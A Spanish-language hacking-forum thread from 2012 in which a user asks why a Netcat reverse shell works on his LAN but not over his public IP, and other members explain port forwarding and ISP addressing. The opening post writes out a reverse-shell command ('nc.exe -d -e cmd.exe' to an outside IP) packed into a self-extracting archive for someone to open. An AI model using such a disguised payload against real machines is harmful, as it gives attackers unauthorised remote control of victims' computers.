elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Netcat no me funciona con ip pública
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Netcat no me funciona con ip pública  (Leído 6,458 veces)
Crutchlow_13

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Netcat no me funciona con ip pública
« en: 5 Septiembre 2012, 23:38 pm »

Hola.

Hace poco descubrí la herramienta netcat y la verdad es que es increíble. Solo he podido obtener la shell de mi portátil en mi red local poniendo la ip interna (192.168.1.33). Hago el archivo SFX como bien indica WHK en el thread http://foro.elhacker.net/hacking_basico/jugando_con_netcat-t159799.0.html pero en vez de poner mi ip interna pongo mi ip pública(83.54.17.205) sacada de miip.es. Luego pongo en escucha el puerto(nc -vv -L -p 1234) que he indicado que se conecte en el  archivo SFX(nc.exe -d -e cmd.exe 83.54.17.205 1234), le digo que lo abra pero no me aparece la shell. De hecho, hemos probado hasta con shell directa pero nada de nada.

He probado también en vez de poner mi ip pública, asignar un subdominio de no-ip pero tampoco funciona.

Estoy haciendo algo mal? Por favor, si se necesitan más datos sobre el método decidmelo. Muchas gracias de antemano.

P.D: Él pone a la escucha el puerto 80 pero al hacerlo yo me pone "Can't grab 0.0.0.0:80 with bind", alguien sabe a que se debe?
« Última modificación: 5 Septiembre 2012, 23:41 pm por Crutchlow_13 » En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Netcat no me funciona con ip pública
« Respuesta #1 en: 6 Septiembre 2012, 19:32 pm »

Seguramente tienes que abrir el puerto en el router de tu conexión a internet, en local no hace falta. Busca sobre la conexión inversa, y verás cómo no hace falta entonces abrir ningún puerto...

Si al poner a la escucha el puerto 80 dicen can't grab bind o similar ,es que el puerto ya está en uso, mira si tienes algún servidor web en funcionamiento.
En línea

zhyzura
Colaborador
***
Desconectado Desconectado

Mensajes: 2.503



Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #2 en: 7 Septiembre 2012, 22:52 pm »

ademas de lo que dice el brujo tambien debes de revisar si tu conexion a internet es directa o estas por medio de una subred, por ejemplo si te conectas por DSL tu router si tiene direccion publica, en cambio si te conectas por medio de un servicio de internet por cable lo mas seguro es que no funcionara por que no tienes una ip publica (necesitarias llamar y pedir una, aunque por lo general cobran)

un saludo
En línea

tremolero

Desconectado Desconectado

Mensajes: 270


Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #3 en: 7 Septiembre 2012, 23:11 pm »

Si yo creo que el unico problema sera abrir el puerto....
Pero si el problema que tiene es con los puertos, con la conexion inversa los seguira teniendo lo unico que se consigue con la conexion inversa es cambiar los papeles de servidor por cliente, sino me equivoco, por lo que si el esta usando el cliente y el servidor, si lo hace normal tendra que abrir el puerto en uno y si hace la conexion inversa lo tendra que abrir en el otro.

zhyzura, podrias explicarme a que te refieres con que el servicio por cable no tiene ip publica?

Si entiendo lo que te refieres a cable, yo tengo ONO, creo que te has confundido y querias decirle que no tendra ip estatica y le puede cambiar, porque sino ip publica, como se conecta?

Saludos...
En línea

zhyzura
Colaborador
***
Desconectado Desconectado

Mensajes: 2.503



Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #4 en: 7 Septiembre 2012, 23:55 pm »

creo que no me explique je (mea culpa)

en ambos casos tienes ip publica, peeeeeero a lo que me refiero es que en el caso de los DSL la ip publica la tiene asiganada tu modem/router, por lo tanto basta con que redirecciones puertos alli y listo.
y en el caso de los cablemodems (hablando de aqui en mexico y me supongo sera casi igual en la mayoria de los paises) la ip publica no la tiene asignada tu router sino otro servidor al cual obviamente no tienes acceso tu cablemodem sino otro servidor al cual obviamente no tenemos acceso y esto es sencillo de averiguar, alguien que esta en una red de ese tipo basta con que entre a www.whatismyip.org y notara que la ip que le marca alli no es ni la ip de su computadora y mucho menos la de su modem por lo tanto aunque redirecciones puertos no le funcionaria.


no se si me di a entender je
En línea

Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Netcat no me funciona con ip pública
« Respuesta #5 en: 8 Septiembre 2012, 00:02 am »

te dejo una GUI para nc creada por mi http://www.mediafire.com/?32viep8d0ohba58
En línea

tremolero

Desconectado Desconectado

Mensajes: 270


Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #6 en: 8 Septiembre 2012, 00:17 am »

pues zhyzura... yo tengo cable con ONO, y en mi casa tengo un modem al que la ip que le llega es la publica que muestran paginas como la que tu has indicado, por lo que yo abriendo los puertos en mi router si que puedo hacerlo funcionar.

Haber si nos estamos confundiendo de servicio y tienes uno diferente :S

Saludos....
En línea

Tr0Y4N0

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #7 en: 8 Septiembre 2012, 04:19 am »

El principio es el mismo que por ejemplo utilizar tu ordenador como un servidor web accesible por internet, la dirección WAN que te da la web que dice zhyzura debe de ser igual a la de tu router, después redireccionas el puerto a la ip de tu ordenador para que asi el router identifique que equipo es el servidor.

Revisa los servicios y mira que ninguno tenga el mismo puerto asignado que tu conexión inversa.

Un saludo ;)
En línea

HdM


Desconectado Desconectado

Mensajes: 1.674



Ver Perfil
Re: Netcat no me funciona con ip pública
« Respuesta #8 en: 8 Septiembre 2012, 12:43 pm »

Hola.

@zhyzura:

¿En serio que en México funciona inet por cable como indicas?   :rolleyes: :o

Es decir, pagas al ISP para tener inet y si quieres montar algún servicio que requiera de la apertura de algún puerto, ¿tienes que pagar más? Veo muy raro eso y si es así, sólo tiene un nombre...

Saludos.
En línea

- Nice to see you again -
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
X-oom funciona pero no funciona (sungoku?)
Multimedia
Lordofchaos 4 3,777 Último mensaje 12 Diciembre 2005, 20:44 pm
por Sourraund
Login con md5 , BD funciona pero no funciona « 1 2 »
PHP
securedigital 16 9,530 Último mensaje 25 Mayo 2007, 17:46 pm
por securedigital
Netcat: ayuda .bat que funciona como Shell inversa...
Hacking
n0names 6 5,131 Último mensaje 8 Marzo 2012, 21:53 pm
por kub0x
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines